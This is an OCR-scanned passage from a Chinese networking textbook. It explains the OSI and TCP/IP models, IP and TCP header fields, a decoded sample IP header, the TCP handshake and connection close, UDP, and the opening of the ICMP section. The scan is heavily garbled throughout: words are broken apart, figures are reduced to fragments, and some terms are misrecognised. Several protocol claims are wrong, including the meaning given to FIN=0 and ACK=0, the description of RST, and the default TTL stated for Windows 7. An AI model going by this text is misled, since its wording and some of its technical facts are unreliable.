国际 标准 化 组 织 ISOCInternatio 


结构 提供 了 可 行 的 机 制 。 


TCP/IP 是 Transmission Control Protocol/Internet Protocol 的 简写 ,中 译名 为 传输 控 
制 协议 /因特网 互联 协议 ,又 名 网 络 通 信 协 议 , 是 Internet 最 基本 的 协议 、Internet 国际 互联 
网 络 的 基础 ,由 网 络 层 的 IP 协议 和 传输 层 的 TCP 协议 组 成 。TCP/IP 定义 了 电子 设备 如 
何 连 入 因特网 ,以 及 数据 如 何在 它们 之 间 传 输 的 标准 。 协 议 采 用 了 4 层 的 层级 结构 ,每 一 层 


nal Organization for Standardization) 把 计算 机 与 计算 
机 之 间 的 通信 分 成 7 个 互相 联结 的 协议 层 , 由 低 到 高 分 别 是 物理 层 、 数 据 链 路 层 、 网 络 层 、 传 
输 层 会话 层 .表示 层 , 应 用 层 , 很 少 有 产品 完全 符合 七 层 模型 ,然而 七 层 参考 模型 为 网 络 的 


都 呼叫 它 的 下 一 层 所 提供 的 协议 来 完成 自己 的 需求 。 


TCP/IP 组 的 4 层 模 型 .OSI 参考 模型 和 常用 协议 的 对 应 关系 如 图 2-1 Bros ,虽然 一 般 
标识 为 TCP/IP, 但 实际 上 在 TCP/IP 协议 族 内 有 很 多 不 同 的 协议 ,常用 的 有 IP, TCP, 


UDP,ICMP,ARP 等 。 


OSI 模型 


TCP/IP 模 型 


应 用 层 
表示 层 
会 话 层 


应 用 层 


TCP/IP 协 议 组 
ak: 


r 


SMTP | | DNS 


RIP 


Telnet | 


传输 层 |] 


UDP 


网 络 层 


Internet/z 


IGMP 


数据 链 路 层 


网 络 接口 层 


2-1 


2.1 


2.1.1 网 际 协议 IP 


IP 是 英文 Internet Protocol( 网 络 之 间 互 连 的 协议 ) 的 缩写 ,中文 简称 为 “网 协 ”, 也 就 是 


物理 层 


FE 
以 太 网 dd 


1 
L 


1 1 
dr 


TCP/IP 和 OSI 的 对 应 关系 


常用 的 网 络 协议 
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为 计算 机 网 络 相 互 连 接 进行 通信 而 设计 的 协议 。 在 因特网 中 , 它 是 能 使 连接 到 网 上 的 所 有 
计算 机 网 络 实现 相互 通信 的 一 套 规则 ,规定 了 计算 机 在 因特网 上 进行 通信 时 应 当 遵守 的 规 
则 ,任何 厂家 生产 的 计算 机 系统 ,只 要 遵守 IP 协议 就 可 以 与 因特网 互 连 互通 。IP 是 网 络 层 
上 的 主要 协议 ,同时 被 TCP 协议 和 UDP 协议 使 用 ,基本 原理 如 下 。 

1. 网 络 互联 

以 太 网 ,分 组 交换 网 相互 之 间 不 能 互通 ,不 能 互通 的 主要 原因 是 它们 所 传送 数据 的 基本 
单元 (技术 上 称 之 为 “ 帧 ”") 的 格式 不 同 。IP 协议 实际 上 是 一 套 由 软件 、 程 序 组 成 的 协议 软 
件 , 它 把 各 种 不 同 “ 帧 "统一 转换 成 “IP 数据 包 ” 格 式 , 这 种 转换 是 因特网 的 一 个 最 重要 的 特 
点 ,使 所 有 计算 机 都 能 在 因特网 上 实现 互通 , 即 具 有 “开放 性 ”的 特点 。 

2. 数据 包 

数据 包 也 是 分 组 交换 的 一 种 形式 ,就 是 把 所 传送 的 数据 分 段 打 成 “ 包 ”, 再 传送 出 去 。 但 
是 ,与 传统 的 “连接 型 "分 组 交换 不 同 , 它 属于 “无 连接 型 ”, 是 把 打 成 的 每 个 “ 包 ”( 分 组 ) 都 作 
为 一 个 “独立 的 报 文 ”传送 出 去 ,所 以 叫做 “数据 包 ”。 这 样 ,在 开始 通信 之 前 就 不 需要 先 连 接 
好 一 条 电路 ,各 个 数据 包 不 一 定 都 通过 同一 条 路 径 传输 ,所 以 叫做 “无 连接 型 ”。 这 一 特点 非 
常 重要 , 它 大 大 提高 了 网 络 的 坚固 性 和 安全 性 。 每 个 数据 包 都 有 报头 和 报 文 这 两 个 部 分 , 报 
头 中 有 目的 地 址 等 必要 内 容 ,使 每 个 数据 包 不 经 过 同样 的 路 径 也 能 准确 地 到 达 目 的 地 ,在 目 
的 地 重新 组 合 还 原 成 原来 发 送 的 数据 。 这 就 要 IP 具有 分 组 打包 和 集合 组 装 的 功能 。 


2.1.2 IP 头 结构 


在 网 络 协议 中 ,IP 是 面向 非 连接 的 ,所 谓 的 非 连接 就 是 传递 数据 的 时 候 ,不 检测 网 络 是 
否 连 通 , 所 以 是 不 可 靠 的 数据 报 协议 。IP 协议 主要 负责 在 主机 之 间 寻 址 和 选择 数据 包 
路 由 。 

IP 数据 包 指 一 个 完整 的 IP 信息 ,IP 的 功能 定义 在 IP 头 结构 中 ,IP 头 结构 如 图 2-2 
所 示 。 
0 78 15 16 31 


Eksa again] 。 服务 类 型 TOS(8fir) 总 长 度 (16 们 ) 
标识 (16 位 ) [mecu] KNBOD 
生存 时 间 TTL8 位 ) | Hamenei | 头 部 校 验 和 (16 们 ) 
源 IP 地 址 (32 位 ) 报头 区 
目标 IP 地 址 (32 位 ) 
选项 
4 
数据 数据 区 
J 


2-2 PAH 
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IP 头 结构 在 所 有 协议 中 都 是 固定 的 ,对 图 2-2 进行 如 下 说 明 。 

CD 版 本 号 (Version): 长 度 4 位。 标识 目前 采用 的 IP 协议 的 版 本 号 。 一 般 的 值 为 
0100(IPv4) ,0110(IPv6) 。 

(2) IP 包头 长 度 (Header Length): 长 度 4 位 。 这 个 字段 的 作用 是 描述 IP 包头 的 长 
度 , 因 为 在 卫 包 头 中 有 变 长 的 可 选 部 分 。 单 位 为 4 个 字 节 ,因此 ,一 个 耳 包 头 的 长 度 最 
长 为 1111, 即 15 «4— 60 个 字 节 。 普 通 IP 数据 报 该 字段 的 值 是 5( 即 20 个 字 节 的 
KH». 

(3) 服务 类 型 TOS(Type of Service) : 长 度 8 位 , 按 位 进行 如 下 定义 ,如 图 2-3 所 示 。 


$9. 4. X Go 4x $5 $9 Y 
优先 权 DTR 保留 
图 2-3 服务 类 型 


优先 权 : 占 0 一 2 位 ,这 3 位 二 进 制 数 表 示 的 数据 范围 为 000 一 111(0 一 7), 取 值 越 大 数 
据 越 重要 。 

短 延 迟 位 DCDelay) ; 该 位 被 置 1 时 ,数据 报请 求 以 短 延 时 信道 传输 ,0 表示 正常 延 时 。 

高 吞吐 量 位 TC Throughput): 该 位 被 置 1 时 ,数据 报请 求 以 高 吞吐 量 信道 传输 ,0 表示 
普通 。 

高 可 靠 性 位 RCReliability) : 该 位 被 置 1 时 ,数据 报请 求 以 高 可 靠 性 信道 传输 ,0 表示 
普通 。 
保留 位 : 第 6 和 第 7 位 ,目前 未 用 ,但 需 置 0。 应 注意 在 有 些 实现 中 ,可 以 使 用 第 6 位 表 
示 低 成 本 。 

对 不 同 应 用 ,TOS 的 建议 数据 值 列 于 表 2-1 中 ,例如 对 于 Telnet 数据 值 是 10000( 二 进 
制 ) 转 换 成 十 六 进 制 是 0x10。 

表 2-1 TOS 的 建议 数据 值 
应 用 程序 短 延迟 位 D ”高 吞吐 量 位 了 高 可 靠 性 位 R ” 低 成 本 位 十 六 进 制 值 — 


Telnet 1 0 0 0 0x10 短 延 迟 
FTP 控制 ] 0 0 0 0x10 短 延 迟 
FTP 数据 0 1 0 0 0x08 高 吞吐 量 
TFTP 1 0 0 0 0x10 短 延 迟 
SMTP 命令 1 0 0 0 0x10 短 延 迟 
SMTP 数据 0 1 0 0 0x08 高 吞吐 量 
DNS UDP 查询 1 0 0 0 0x10 短 延迟 
DNS TCP 查询 0 0 0 0 0x00 普通 
DNS 区 域 传输 0 1 0 0 0x08 APE 
ICMP 差错 0 0 0 0 0x00 普通 
ICMP 查询 0 0 0 0 0x00 普通 
SNMP 0 0 1 0 0x04 高 可 靠 性 
IGP 0 0 1 0 0x04 高 可 靠 性 
NNTP 0 0 0 1 0x02 低 成 本 
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(4) 封包 总 长 度 : 总 长 度 用 16 位 二 进 制 数 表示 ,总 长 度 字段 是 指 整 个 IP 数据 报 的 长 
度 , 以 字 节 为 单位 ,所 以 IP. 包 最 大 长 度 65 535 字 节 。 

(5) 标识 : 长 度 16 位 。 该 字段 和 Flags 和 Fragment Offset 字段 联合 使 用 ,对 较 大 的 上 
层 数 据 包 进 行 分 段 (fragment) 操 作 。 路 由 器 将 一 个 包 拆 分 后 ,所 有 拆 分 开 的 小 包 被 标记 相 
同 的 值 ,以 便 目 的 端 设备 能 够 区 分 哪个 包 属 于 被 拆 分 开 的 包 的 一 部 分 。 

(6) 标志 (Flags): 让 目的 主机 来 判断 新 来 的 分 段 属 于 哪个 分 组 ,长 度 3 位 。 该 字段 第 
一 位 不 使 用 。 第 二 位 是 DF(Don't Fragment) 位 ,DF 位 设 为 1 时 表明 路 由 器 不 能 对 该 上 层 
数据 包 分 段 。 如 果 一 个 上 层 数 据 包 无 法 在 不 分 段 的 情况 下 进行 转发 , 则 路 由 器 会 丢弃 该 上 
层 数据 包 并 返回 一 个 错误 信息 。 第 三 位 是 MF (More Fragments) 位 , 当 路 由 器 对 一 个 上 层 
数据 包 分 段 , 则 路 由 器 会 在 除了 最 后 一 个 分 段 之 外 的 其 他 分 段 的 下 包 的 包头 中 将 MF 位 设 
为 1。 

CD 片 偏 移 (Fragment Offset): 长 度 13 位 。 表 示 该 PP 包 在 该 组 分 片 包 中 位 置 ,接收 端 
靠 此 来 组 装 还 原 IP 包 。 

(8) 存活 时 间 : CTTL. Time To Live); 生存 时 间 用 8 位 二 进 制 数 表 示 , 它 指定 了 数据 
报 可 以 在 网 络 中 传输 的 最 长 时 间 。 在 实际 应 用 中 为 了 简化 处 理 过 程 , 把 生存 时 间 字 段 设 置 
成 了 数据 报 可 以 经 过 的 最 大 路 由 器 数 。TTL 的 初始 值 由 源 主 机 设置 (通常 为 32、64、128 或 
者 256) ,一 旦 经 过 一 个 处 理 它 的 路 由 器 , 它 的 值 就 减 去 1。 当 该 字段 的 值 减 为 0 时 ,数据 报 
就 被 丢弃 ,并 发 送 ICMP 报 文通 知 源 主机 ,这 样 可 以 防止 进入 一 个 循环 回路 时 ,数据 报 无 休 
止 地 传输 。 用 ping 命令 ,得 到 对 方 的 TTL 值 时 ,可 以 判断 对 方 使 用 的 操作 系统 的 类 型 , 默 
认 情 况 下 ,Linux 系统 的 TTL 值 为 64 a} 255. Windows NT/2000/XP 系统 的 默认 TTL 值 
为 128,Windows 7 系统 的 TTL 值 是 64, Windows 98 系统 的 TTL fii 32, UNIX 主机 的 
TTL 值 为 255 。 

(9) HN (Protocol); 长 度 8 位 。 标 识 了 上 层 所 使 用 的 协议 ,常用 的 网 际 协议 编号 如 
表 2-2 所 示 。 

表 2-2 常用 网 际 协议 编号 


十 进 制 编号 box 说 明 
0 无 保留 
1 ICMP 网 际 控制 报 文 协 议 
2 IGMP 网 际 组 管理 协议 
3 GGP 网 关 -网 关 协议 
4 x 未 分 配 
5 ST 流 
6 TCP 传输 控制 协议 
8 EGP 外 部 网 关 协 议 
9 IGP 内 部 网 关 协议 
1 NVP 网 络 声音 协议 


17 UDP 用 户 数据 报 协议 
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(0) 校 验 和 : 首先 将 该 字段 设置 为 0, 然 后 将 IP 头 的 每 16 位 进行 二 进 制 取 反 求 和 ,将 
结果 保存 在 校 验 和 字段 。 

(11) 源 IP 地 址 : 将 IP 地 址 看 作 是 32 位 数值 则 需要 将 网 络 字 节 顺序 转化 为 主机 字 节 
顺序 。 转 化 的 方法 是 : 将 每 4 个 字 节 首尾 互 换 , 将 2、3 字 节 互 换 。 

(12) 目的 IP 地 址 : 转换 方法 和 源 IP 地 址 一 样 。 

用 工具 软件 Sniffer 和 Wireshark 抓 到 的 头 结构 如 下 ,Sniffer 和 Wireshark 工具 软件 的 
使 用 请 参考 实验 部 分 的 第 9 章 实验 一 和 实验 二 。 

抓 到 的 IP 头 部 : 45 00 00 30 52 52 40 00 80 06 2c 23 c0 a8 01 01 d8 03 e2 15 

2: 

4 是 IP 协议 的 版 本 (Version), 说 明 是 IPv4, 新 的 版 本 号 为 6, 现 在 IPv6 还 没有 普遍 
使 用 。 

5 表示 IP 头 部 的 长 度 , 是 一 个 4 位 字段 ,说 明 IP 头 部 的 长 度 是 20 字 节 ,这 是 标准 的 TP 
头 部 长 度 。 

00 是 服务 类 型 (Type of Service)。 这 个 8 位 字段 由 3 位 的 优先 权 子 字段 (现在 已 经 被 
忽略 ) ,4 位 的 TOS 子 字段 包含 最 小 延 时 、 最 大 吞吐 量 .最 高 可 靠 性 以 及 最 小 费用 ,这 4 位 最 
多 只 能 有 一 个 为 1, 本 例 中 都 为 0, 表 示 是 一 般 服务 构成 。 

接着 的 两 个 字 节 00 30 是 IP 数据 报 文 总 长 ,包含 头 部 以 及 数据 。 

再 是 两 个 字 节 的 标志 位 (Identification) : 5252( 十 六 进 制 ) ,转换 为 十 进 制 就 是 21 074。 
这 个 是 让 目的 主机 来 判断 新 来 的 分 段 属于 哪个 分 组 。 

下 一 个 字 节 40, 转 换 为 二 进 制 就 是 0100 0000, 其 中 第 一 位 是 IP 协议 目前 没有 用 上 的 ， 
为 0。 接 着 的 是 两 个 标志 DF 和 MF。DF 为 1 表示 不 要 分 段 ,MF 为 1 表示 还 有 进一步 的 分 
段 (本 例 为 0) 。 然 后 的 0 0000 是 分 段 偏 移 (Fragment Offset), 

80 这 个 字 节 就 是 TTL(Time To Live) 了 ,表示 一 个 IP 数据 流 的 生命 周期 ,执行 ping 
命令 后 能 得 到 TTL 的 值 , 很 多 文章 就 说 通过 TTL 位 来 判别 主机 类 型 。 因 为 一 般 主 机 都 有 
默认 的 TTL 值 ,不 同系 统 的 默认 值 不 一 样 。 比 如 Windows 为 128 ,本 例 中 为 80 ,转换 为 十 
进 制 就 是 128 了 ,ping 的 机 器 是 Windows 2000。 

接 下 来 的 是 06, 这 个 字 节 表示 传输 层 的 协议 类 型 (Protocol),6 表示 传输 层 是 TCP 
协议 。 

2c 23 这 个 16 位 字段 是 头 校 验 和 (Header Checksum). 

$% FÆ c0 a8 01 01 ,这 个 就 是 源 地 址 (Source Address) 了 ,也 就 是 本 机 的 IP 地 址 。( 十 
六 进 制 转换 成 十 进 制 ) ,转换 为 十 进 制 的 IP 地 址 就 是 : 192. 168. 1. 1 ,同样 , 接 下 来 的 32 位 
d8 03 e2 15 是 目标 地 址 : 216. 3. 226. 21. 


2.1.3 传输 控制 协议 TCP 

在 因特网 协议 族 (Internet Protocol Suite) 中 ,TCP 层 是 位 于 IP 层 之 上 ,应 用 层 之 下 的 
中 间 层 , 即 TCP 是 传输 层 协议 。 不 同 主机 的 应 用 层 之 间 经 常 需要 可 靠 的 、 像 管道 一 样 的 连 
接 , 但 是 TP 层 不 提供 这 样 的 流 机 制 ,而 是 提供 不 可 靠 的 包 交 换 , 而 TCP 提供 可 靠 的 应 用 数 
据 传 输 。TCP 在 两 个 或 多 个 主机 之 间 建 立 面向 连接 的 通信 。 
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应 用 层 向 TCP 层 发 送 用 于 网 间 传 输 的 、 用 8 位 字 节 表示 的 数据 流 ,然后 TCP 把 数据 流 
分 割 成 适当 长 度 的 报 文 段 (通常 受 该 计算 机 连接 的 网 络 的 数据 链 路 层 的 最 大 传送 单元 
(MTU) 的 限制 )。 之 后 TCP 把 结果 包 传 给 IP 层 ,由 它 来 通过 网 络 将 包 传 送 给 接收 端 实体 
的 TCP 层 。TCP 为 了 保证 不 发 生 丢 包 , 就 给 每 个 字 节 一 个 序号 ,同时 序号 也 保证 了 传送 到 
接收 端 实体 的 包 的 按 序 接收 。 然 后 接收 端 实体 对 已 成 功 收 到 的 字 节 发 回 一 个 相应 的 确认 
CACK) ,如 果 发 送 端 实体 在 合理 的 往返 时 延 内 未 收 到 确认 ,那么 对 应 的 数据 (假设 丢失 了 ) 
将 会 被 重 传 。TCP 用 一 个 校 验 和 函数 来 检验 数据 是 否 有 错误 ,在 发 送 和 接收 时 都 要 计算 校 
验 和 。 首 先 ,TCP 建立 连接 之 后 ,通信 双方 可 以 同时 进行 数据 的 传输 ; 其 次 ,他 是 全 双 工 的 ， 
在 保证 可 靠 性 上 ,采用 超时 重 传 和 捕 带 确 认 机 制 。 

和 IP 一 样 ,TCP 的 功能 受 限于 其 头 中 携带 的 信息 ,因此 理解 TCP 的 机 制 和 功能 需要 
了 解 TCP 头 中 的 内 容 , 图 2-4 显示 了 TCP 头 结构 。 


来 源 端口 (2 字 节 ) 目的 端口 (2 字 节 ) 
序号 (4 字 节 ) 确认 序号 (4 字 节 ) 
头 长 度 (4 位 ) 保留 (6 位 ) 
URG ACK PSH RST SYN PIN 
窗口 大 小 (2 字 节 ) 校 验 和 (16 位 ) 
紧急 指针 (16 位 ) 选项 (可 选 ) 
数据 


2-4 TCP 头 结构 


对 图 2-4 说 明 如 下 。 

A) TCP 源 端 口 (Source PorO ; 16 位 的 源 端 口 包含 初始 化 通信 的 端口 号 , 源 端 口 和 IP 
地 址 的 作用 是 标识 报 文 的 返回 地 址 。 

(2) TCP 目的 端口 (Destination PorO : 16 位 的 目的 端口 域 定义 传输 的 目的 ,这 个 端口 
指明 报 文 接收 计算 机 上 的 应 用 程序 地 址 接口 。 

(3) 序列 号 (Sequence Number) : 序列 号 长 度 为 32 位 ,TCP 连 线 发 送 方向 接收 方 发 送 
的 封包 顺序 号 。 

(4) 确认 序号 (Acknowledge Number): 确认 序号 长 度 为 32 位 ,接收 方 回 发 的 应 答 顺 
序号 。 

G) 头 长 度 (Header Length): 表示 TCP 头 的 双 4 字 节 数 ,如 果 转 化 为 字 节 个 数 需要 乘 
以 4,TCP 头 部 长 度 一 般 为 20 个 字 节 ,因此 通常 它 的 值 为 5。 

(6) URG: 是 否 使 用 紧急 指针 ,0 为 不 使 用 ,1 为 使 用 。 

(7) ACK: 请 求 /应 答 状 态 ,0 为 请 求 ,1 为 应 答 。 

(8) PSH: 以 最 快 的 速度 传输 数据 。 置 1 时 请 求 的 数据 段 在 接收 方 得 到 后 就 可 直接 送 
到 应 用 程序 ,而 不 必 等 到 缓冲 区 满 时 才 传 送 。 

(9) RST: 连 线 复 位 ,首先 断 开 连 接 , 然 后 重建 。 

(10) SYN: 同步 连 线 序号 ,用 来 建立 连接 。 在 连接 请 求 中 ,SYN 王 1,ACK 一 0; 连接 响 
应 时 ,SYN=1,ACK=1; 确认 时 ,SYN 王 0,ACK 一 1。 
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(Q1) FIN: 结束 连 线 。FIN 为 0 是 结束 连 线 请 求 ,FIN 为 1 表示 结束 连 线 。 在 TCP 的 
四 次 挥手 时 ,第 一 次 挥手 ACK —1. FIN— 10; 第 二 次 挥手 ACK 二 1,FIN 二 0; 第 三 次 挥手 
ACK-—1.FIN—1; 第 四 次 挥手 ACK=1,FIN=0。 

(12) 窗口 大 小 (Window) : 目的 主机 使 用 16 位 的 域 告诉 源 主机 , 它 想 收 到 的 每 个 TCP 
数据 段 大 小 。 

(13) 校 验 和 (Check Sum) : 这 个 校 验 和 和 IP. 的 校 验 和 有 所 不 同 ,不 仅 对 头 数 据 进行 校 
验 还 对 封包 内 容 校 验 。 

(14) 紧急 指针 (Urgent Pointer): 当 URG 为 1 的 时 候 才 有 效 。TCP 的 紧急 方式 是 发 
送 紧 急 数据 的 一 种 方式 。 


2.1.4 TCP 协议 的 工作 原理 


TCP 提供 两 个 网 络 主机 之 间 的 点 对 点 通信 。TCP 从 程序 中 接收 数据 并 将 数据 处 理 成 
字 节 流 。 首 先 将 字 节 分 成 段 ,然后 对 段 进行 编号 和 排序 以 便 传 输 。 在 两 个 TCP 主机 之 间 交 
换 数据 之 前 ,必须 先 相互 建立 会 话 。TCP 会 话 通过 三 次 握手 完成 初始 化 。 这 个 过 程 使 序号 
同步 ,并 提供 在 两 个 主机 之 间 建 立 虚拟 连接 所 需 的 控制 信息 。 

TCP 在 建立 连接 的 时 候 需 要 三 次 确认 ,俗称 “三 次 握手 ”, 在 断 开 连 接 的 时 候 需 要 四 次 
确认 ,俗称 “四 次 挥手 ”。 

CD 连接 : E TCP/IP 协议 中 ,TCP 协议 提供 可 靠 的 连接 服务 ,采用 三 次 握手 建立 一 个 
连接 。 所 谓 三 次 握手 ,就 是 指 在 建立 一 条 连接 时 通信 双方 要 交换 三 次 报 文 ,如 图 2-5 所 示 ， 
具体 过 程 如 下 。 


192.168.1.116 192.168.1.123 
CET 
我 可 以 连接 到 你 吗 ? 
当然 可 以 
那 我 就 不 客气 了 
' 
L5 三 次 握手 


第 一 次 握手 : 由 客户 机 的 应 用 层 进 程 向 其 传输 层 TCP 协议 发 出 建立 连接 的 命令 , 则 客 
户 机 TCP 向 服务 器 上 提供 某 特定 服务 的 端口 发 送 一 个 请 求 建立 连接 的 报 文 段 ,该 报 文 段 中 
SYN 被 置 1, 同 时 包含 一 个 初始 序列 号 <( 系 统 保持 着 一 个 随时 间 变 化 的 计数 器 ,建立 连接 
时 该 计数 器 的 值 即 为 初始 序列 号 ,因此 不 同 的 连接 初始 序列 号 不 同 ) 。 

第 二 次 握手 : 服务 器 收 到 建立 连接 的 请 求 报 文 段 后 ,发 送 一 个 包含 服务 器 初始 序号 y. 
SYN 被 置 1 ,确认 号 置 为 zx 十 1 的 报 文 段 作 为 应 答 。 确 认 号 加 1 是 为 了 说 明 服务 器 已 正确 收 
到 一 个 客户 连接 请 求 报 文 段 , 因 此 从 逻辑 上 来 说 ,一 个 连接 请 求 占用 了 一 个 序号 。 

第 三 次 握手 : 客户 机 收 到 服务 器 的 应 答 报 文 段 后 ,也 必须 向 服务 器 发 送 确认 号 为 > 十 1 
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的 报 文 段 进行 确认 。 同 时 客户 机 的 TCP 协议 层 通 知 应 用 层 进程 ,连接 已 建立 ,可 以 进行 数 
据 传 输 了 。 

完成 三 次 握手 ,客户 端 与 服务 器 开始 传送 数据 ， 

(2) 关闭 : 需要 断 开 连接 的 时 候 ,TCP 也 需要 互相 确认 才 可 以 断 开 连接 ,俗称 “四 次 挥 
手 ”, 如 图 2-6 所 示 , 具 体 过 程 如 下 。 


192.168.1.116 192.168.1.123 


我 要 结束 连接 


当然 可 以 


好 ， 收 到 


2-6 4 次 挥手 


第 一 次 挥手 : 由 客户 机 的 应 用 进程 向 其 TCP 协议 层 发 出 终止 连接 的 命令 , 则 客户 TCP 
协议 层 向 服务 器 TCP 协议 层 发 送 一 个 FIN 被 置 1 的 关闭 连接 的 TCP 报 文 段 。 

第 二 次 挥手 : 服务 器 的 TCP 协议 层 收 到 关闭 连接 的 报 文 段 后 ,就 发 出 确认 ,确认 序号 
为 已 收 到 的 最 后 一 个 字 节 的 序列 号 加 1, 同 时 把 关闭 的 连接 通知 其 应 用 进程 ,告诉 它 客户 机 

已 经 终止 了 数据 传送 。 在 发 送 完 确认 后 ,服务 器 如 果 有 数据 要 发 送 , 则 客户 机 仍然 可 以 继续 

接收 数据 ,因此 把 这 种 状态 叫 半 关 闭 (Half-close) 状 态 , 因 为 服务 器 仍然 可 以 发 送 数 据 ,并 且 
可 以 收 到 客户 机 的 确认 ,只 是 客户 方 已 无 数据 发 向 服务 器 了 。 

第 三 次 挥手 : 如 果 服 务 器 应 用 进程 也 没有 要 发 送 给 客户 方 的 数据 了 ,就 通知 其 TCP 协 
议 层 关闭 连接 。 这 时 服务 器 的 TCP 协议 层 向 客户 机 的 TCP 协议 层 发 送 一 个 FIN 置 1 的 报 
文 段 ,要 求 关 闭 连 接 。 

第 四 次 挥手 : 同样 ,客户 机 收 到 关闭 连接 的 报 文 段 后 ,向 服务 器 发 送 一 个 确认 ,确认 序 
号 为 已 收 到 数据 的 序列 号 加 1。 当 服务 器 收 到 确认 后 ,整个 连接 被 完全 关闭 。 

实例 : 

IP 192.168.1.116: 3337 > 192.168.1.123: 7788: S 3626544836:3626544836 


IP 192.168.1.123: 7788 » 192.168.1.116: 3337: S 1739326486 :1739326486 ack 3626544837 
IP 192.168.1.116: 3337 > 192.168.1.123: 7788: ack 1739326487, ack 1 


第 一 次 握手 : 192.168. 1. 116 发 送 位 码 SYN 王 1, 随 机 产生 Seq Number = 3626544836 
的 数据 包 到 192. 168. 1. 123.192. 168. 1. 123 由 SYN — 1 知道 192. 168. 1. 116 要 求 建立 
连接 ; 

第 二 次 握手 : 192. 168. 1. 123 收 到 请 求 后 要 确认 连接 信息 ,向 192. 168. 1. 116 发 送 
ACK Number— 3626544837 .SYN— 1, ACK =1 , RLF ^E Seq 二 1739326486 的 包 ; 

第 三 次 握手 : 192.168. 1. 116 收 到 后 检查 ACK Number 是 否 正确 , 即 第 一 次 发 送 的 Seq 
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Number 十 1, 以 及 位 码 ACK 是 否 为 1, 若 正确 ,192. 168. 1. 116 会 再 发 送 ACK Number = 
1739326487, 则 连接 建立 成 功 。 
具体 操作 请 参考 第 9 章 实验 三 。 


2.1.5 用 户 数据 报 协议 UDP 


用 户 数据 报 协议 (User Datagram Protocol, UDP) 是 一 个 简单 的 面向 数据 报 的 传输 层 
(Transport Layer) HHX. E TCP/IP 模型 中 ,UDP 为 网 络 层 (Network Layer) 以 下 和 应 用 层 
(Application Layer) 以 上 提供 了 一 个 简单 的 接口 。UDP 只 提供 数据 的 不 可 靠 交 付 , 它 一 旦 
把 应 用 程序 发 给 网 络 层 的 数据 发 送出 去 ,就 不 保留 数据 备份 (所 以 UDP 有 时 候 也 被 认为 是 
不 可 靠 的 数据 报 协议 )。UDP 在 IP 数据 报 的 头 部 仅仅 加 入 了 复 用 和 数据 校 验 ( 字 段 )。 由 
于 缺乏 可 靠 性 ,UDP 应 用 一 般 必须 允许 一 定量 的 丢 包 、 出 错 和 复制 。 

常用 的 网 络 服 务 中 ,域名 系统 Domain Name System (DNS) 使 用 UDP 协议 。 当 用 户 在 
应 用 程序 中 输入 DNS 名 称 时 ,DNS 服务 可 以 将 此 名 称 解析 为 与 此 名 称 相关 的 TP 地 址 。 

某 些 程序 (比如 腾讯 的 QQ) 使 用 的 是 UDP 协议 ,UDP 协议 在 TCP/IP 主机 之 间 建 立 
快速 .轻便 .不 可 靠 的 数据 传输 通道 ,UDP 的 结构 如 图 2-7 所 示 。 


IP 数 据 报 
F IP 报 头 | IP 有 效 负载 


i 
UDP 消息 4 


UDP 报头 消息 


2-7 UDP 的 结构 


UDP 和 TCP 传递 数据 的 差异 : UDP 和 TCP 传递 数据 的 差异 类 似 于 电话 和 明信片 之 
间 的 差异 。TCP 就 像 电话 ,必须 先 验证 目标 是 否 可 以 访问 后 才 开 始 通信 。UDP 就 像 明 信 
片 , 信 息 量 很 小 而 且 每 次 传递 成 功 的 可 能 性 很 高 ,但 是 不 能 完全 保证 传递 成 功 。UDP 通常 由 
每 次 传输 少量 数据 或 有 实时 需要 的 程序 使 用 。 在 这 些 情 况 下 ,UDP 的 低 开 销 比 TCP 更 适合 。 
UDP 的 头 结构 比较 简单 ,如 图 2-8 所 示 。 


源 端口 (2 字 节 ) 目的 端口 (2 字 节 ) 
封 报 长 度 (2 字 节 ) 校 验 和 (2 FW) 
数据 


2-8 UDP 的 头 结构 


对 图 2-8 的 结构 说 明 如 下 。 

CD 源 端 口 (Source Port): 16 位 的 源 端口 域 包含 初始 化 通信 的 端口 号 。 源 端口 和 IP. 
地 址 的 作用 是 标识 报 文 的 返回 地 址 。 

(2) 目的 端口 (Destination Port); 16 位 的 目的 端口 域 定 义 传 输 的 目的 。 这 个 端口 指明 
报 文 接收 计算 机 上 的 应 用 程序 地 址 接口 。 

G) 封包 长 度 (Length) : 16 位 ,UDP 头 和 数据 的 总 长 度 。 
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(4) 校 验 和 (Check Sum): 16 位 ,和 TCP 的 校 验 和 一 样 , 不 仅 对 头 数据 进行 校 验 ,还 对 
包 的 内 容 进 行 校 验 。 

对 UDP 报头 的 分 析 如 图 2-9 所 示 , 从 图 中 可 以 看 出 DNS 服务 用 的 端口 是 UDP 协议 的 

53 端口 ,具体 实验 步骤 参见 第 9 章 实验 四 。 
s E: JDP Header 
DES Bes i - i107 源 端口 
m port  — $3 (Domain 目的 端口 
EE reco ERI 


图 2-9 UDP 报头 
2.1.6 控制 消息 协议 ICMP 


ICMP 的 全 称 是 Internet Control Message Protocol。 从 技术 角度 来 说 ,ICMP 就 是 一 
个 “错误 侦 测 与 回报 机 制 ”, 其 目的 就 是 检测 网 络 的 连 线 状况 ， 也 能 确保 连 线 的 准确 性 。 通 
it ICMP 协议 ,主机 和 路 由 器 可 以 报告 错误 并 交换 相关 的 状态 信息 。 

ICMP 提供 一 致 易 懂 的 出 错 报告 信息 。 发 送 的 出 错 报 文 返回 到 发 送 源 数据 的 设备 , 因 
为 只 有 发 送 设 备 才 是 出 错 报 文 的 逻辑 接受 者 。 发 送 设备 随后 可 根据 ICMP 报 文 确定 发 生 错 
误 的 类 型 ,并 确定 如 何 才能 更 好 地 重 发 失败 的 数据 报 。 但 是 ICMP 唯一 的 功能 是 报告 问题 
而 不 是 纠正 错误 ,纠正 错误 的 任务 由 发 送 方 完成 。 

我 们 在 网 络 中 经 常会 使 用 到 ICMP 协议 ,比如 我 们 经 常 使 用 的 用 于 检查 网 络 通 不 通 的 
ping 命令 (Linux 和 Windows 中 均 有 ), 这 个 “ping” 的 过 程 实际 上 就 是 ICMP 协议 工作 的 过 
程 。 还 有 其 他 的 网 络 命令 如 跟踪 路 由 的 Tracert 命令 也 是 基于 ICMP 协议 的 。 

在 下 列 情况 中 ,通常 自动 发 送 ICMP 消息 ,这些 控 制 消息 虽然 并 不 传输 用 户 数 据 , 但 是 
对 于 用 户 数据 的 传递 起 着 重要 的 作用 。 

(1) IP 数据 报 无 法 访问 目标 。 

(2) IP 路 由 器 (网 关 ) 无 法 按 当前 的 传输 速率 转发 数据 报 。 

(3) IP 路 由 器 将 发 送 主机 重 定向 使 用 更 好 的 到 达 目 标的 路 径 。 

ICMP 协议 的 头 结 构 比 较 简单 ,如 图 2-10 所 示 。 

使 用 ping 命令 发 送 ICMP 回应 请 求 消息 。 使 用 ping 命令 ,可 以 检测 网 络 或 主机 通信 
